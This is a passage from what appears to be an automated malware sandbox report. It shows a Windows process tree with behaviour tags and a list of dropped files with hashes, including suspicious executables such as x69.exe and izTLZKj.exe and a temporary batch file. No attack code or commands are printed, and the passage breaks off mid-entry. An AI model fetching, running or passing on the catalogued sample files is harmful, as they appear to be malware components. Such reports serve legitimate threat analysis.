                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:3560
                                                                                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3740
                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                          PID:3892
                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4108
                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                            C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4596
                                                                                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:1040
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                PID:4704
                                                                                                                                                                              • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                PID:1720
                                                                                                                                                                              • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3960
                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:628
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:332
                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3404
                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3128
                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:2532
                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:640
                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:2856
                                                                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                PID:4864
                                                                                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                PID:3568
                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1576
                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2256
                                                                                                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                    "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:1356
                                                                                                                                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:2688
                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:1948
                                                                                                                                                                                                        • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                                                                          C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                          PID:4800
                                                                                                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:4904
                                                                                                                                                                                                          • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                                                            C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:4580
                                                                                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:4472
                                                                                                                                                                                                              • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                                                "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:3572

                                                                                                                                                                                                                Network

                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                      • C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        31KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        7e09f62d9e5df18bab9b0f1398b09bcd

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        f056b21813ed260d4e9c489849373c1caf4e590a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d710adeb5ba5d9416e9c29d5ac2af11c6ce42b3217f566c25c6a13267a7fa6ad

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        07cb9b240211316801649d23200b39a8e607717ba90836226bc5c50af1889d48dcbb5cc22db1e782d341f656cc1649925f368a05de5c205478ce6c329dd5939b

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x69.exe.log

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        bb6a89a9355baba2918bb7c32eca1c94

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\EL7G5HQ8\k1[2].rar

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        68b329da9893e34099c7d8ad5cb9c940

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        cbc4c534fbe66cc13819a167465d406d

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        bb5597208c9c5722cbfb6e931e727c3dcffa6fbd

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        9e31c06e2a32d0de8e21e8a8718bb608b8911c374cb245588ec8dd81b1b38a4c

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c230bd5f5a1be2c0416179bd5879095a089807eb680713e93bf2dde4569f42155b9c623fd718ba69dbc9e48e8e750859d6789f8d22d8b05b45ff56cb6b2507f7

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        5fe54cec739665719801cd30e8ea3e1a

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        34ca5bf59dde5ba40358bfd593ee9841610f4562

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        dd509c76bc069e3838bfcb62baa32c883eb2f4cf5089851f0b46b032a87b7f0e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        a10f368e5ed43845e32532e1fae13692323fc9a1fb501297215ddf88bb113a4cf84f28bc0ff3947a953d14e32434016764de755d2628230f5faa708cb5b78317

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        1f545274ba19d9199a78f74cd05e8187

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        4036cf78d3f310af42963c8f16ae27c5922b5dff

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        3b4780cb2e226f4b05643c0b512960e694f21b35bbbe84d5c5e97628e1f8909c

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        b0f66a6c32cb7f2f96b51c141ffe7df7f4fd61a792e6a3756f54b6d0df6f48d7a3bda23d46ee1e18a22ac995520fb9c4ca1b444d204bdd8f3e4b8651f59adc0d

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        15dde0683cd1ca19785d7262f554ba93

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        d039c577e438546d10ac64837b05da480d06bf69

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        54522d22658e4f8f87ecb947b71b8feb

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        6a6144bdf9c445099f52211b6122a2ecf72b77e9

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        55f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        22310ad6749d8cc38284aa616efcd100

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        440ef4a0a53bfa7c83fe84326a1dff4326dcb515

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        d8cb3e9459807e35f02130fad3f9860d

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5af7f32cb8a30e850892b15e9164030a041f4bd6

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        cae60f0ddddac635da71bba775a2c5b4

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        386f1a036af61345a7d303d45f5230e2df817477

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        b2dd636b7b0d3bfe44cef5e1175828b1fa7bd84d5563f54342944156ba996c16

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        28ed8a8bc132ef56971cfd7b517b17cdb74a7f8c247ef6bff232996210075e06aa58a415825a1e038cfb547ad3dc6882bf1ca1b68c5b360ef0512a1440850253

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        47605a4dda32c9dff09a9ca441417339

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        4f68c895c35b0dc36257fc8251e70b968c560b62

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        0b9ebff96ce87bb2948f7decf425a335

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3172582f4a97c15d0c5162c547fe81b811de8e74

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        9e2d1f92a7985c38161bb08726c708271673b6644d66b327b72e5023a53daf2c

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        4eeaf75114389ca025b6eb589c160f03ddceb2e2c67196f05cdf2da5c946c617816056265a0420dcae13c19781a291ef8c456cd08bca6760bbcdd89a83e96357

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        eb1ad317bd25b55b2bbdce8a28a74a94

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        98a3978be4d10d62e7411946474579ee5bdc5ea6

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        948B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        47aec0ae6e0dfab5f91c35cd65d2c56a

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        0bbe13618bdc0c402539cdfca81471aa501f5cad

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        8f31385012b247db2cc50ecb164208fbbf5f8cdf7bfc951e8c2c8ad5fb04cf0b

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c4b7184a85c1d594012ba86390e651439d6cae63c76b94432faaaea410e4ef9bc62d88e68adf8f3abbe36e18ef9e4dc46c3e31a0d72089f98a22f04c8b4a8f12

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        948B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        721991167161c45d61b03e4dbad4984b

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        fd3fa85d142b5e8d4906d3e5bfe10c5347958457

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        0a7be18529bdbed6fc9f36118a6147920d31099ee0fb5a2a8b6b934d1b9bcefb

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        f1aa4f8e48eeb5b5279530d8557cb292a08b25ad46af0dd072130c395127f6c064c88b04910c626c13f22462104ac3d36fa0d4064fff0ec7528922df54ecdcf0

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        948B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        c1a54dd5a1ab44cc4c4afd42f291c863

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        b77043ab3582680fc96192e9d333a6be0ae0f69d

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        c6dce870a896f3531ae7a10a0c2096d2eb7eb5989ae783aefea6150279502d75

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        010f5093f58b0393d17c824a357513cf4f06239ccddd86c2e0581347ef3b8e7b93f869b0770bdaeb000e4fda7e14f49b9e45663a3839ab049446e9fe08ec535d

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        2ad33642f863ae14ee53bc6853ee330e

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        ca81cc7d8c33a46ebe97bc1d3db55e41a813029e

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        17c7b3c895766071a0d87318ec4134a9032ed113b46d3ba75889819a61a9cc19

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        52c59a7bde3751e07da53f3942c15cc3e19a4bf1929fbc28ae568ed96531852747b4f724e01438e159c4c98bf2d846db205c48e32f4b5984e9fddeb936eb8aa9

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        1542328a8546914b4e2f1aef9cb42bea

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        7a0ac5969dfb20eb974e8a3bd8707243fa68f94f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        7584152ef93be4dc497db509c723f20a1fd09d69df02d62c897eefda6bf4c737

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        b2b117abc97a64a71538d57c7f6c68c405d7ff5ef91dafe768832ff63378cb627af8b035b2a803627754c2219dd26755a2fa28e3a1bb9b1deb32ba13487ee286

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        c2725ae3d241d846de6cbcd661b32aaf

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        26381f5b9872f011e21da499eb50c467715e23da

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        35a882b070c9f98c728af00a387afd3b9473d550a661efce9b8b20b4ad0012df

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        6bcae1738dd58c115d713db3a667d3b027a416928036df8b66e397b35b046c9f86d03411cd088c3c056f744ab1e8ee0d97dd1dc5b1ebf0e3d1ccf367c55ee160

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        64B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        d8b9a260789a22d72263ef3bb119108c

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        376a9bd48726f422679f2cd65003442c0b6f6dd5

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        bd57ad5950df620de68033dd7fa23e15

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        78fe6226353d653b066ada933a55e1712b255c8e

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        8257200487d1bbcbbe82d288574cc19f88700fd7fc157137a8a6dc3bc4c86c6d

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c4cb884c8c07f09f8547869e033998d874e3c83d47e910be1f9f3113a9be0e9384166f57bab20503a05b942fbbda4bb2107fa43f4e943920acd5ed18b448c73a

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        290B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        7122fc4b76138ccce53216538ac4a368

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        d793320e2b3518783018ca634991ca6f394fd587

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        57183830001d79f2972797dc68794d057ad242367428e774706f318250538562

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        dc01d18d6402019fde68b1d779f66dae5a684fb710d61716076270d91e1604c2ce67e51045bcf65b093e0fb879df41b0c2cca1b125f09ad162b3b44378dd32d5

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5F4E1D90.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        69691c7bdcc3ce6d5d8a1361f22d04ac

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        c63ae6dd4fc9f9dda66970e827d13f7c73fe841c

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        08f271887ce94707da822d5263bae19d5519cb3614e0daedc4c7ce5dab7473f1

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        253405e03b91441a6dd354a9b72e040068b1bfe10e83eb1a64a086c05525d8ccae2bf09130c624af50d55c3522a4fbb7c18cfc8dd843e5f4801d9ad2b5164b12

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9933.tmp\9934.tmp\9935.bat

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        2df9441936169e60a9631bf730cd4273

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        979ee79524023a77b9577d077a3472b87fda9834

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3o3ayfn1.nnz.ps1

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        60B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        15KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        56b2c3810dba2e939a8bb9fa36d3cf96

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

                                                                                                                                                                                                                        SHA512

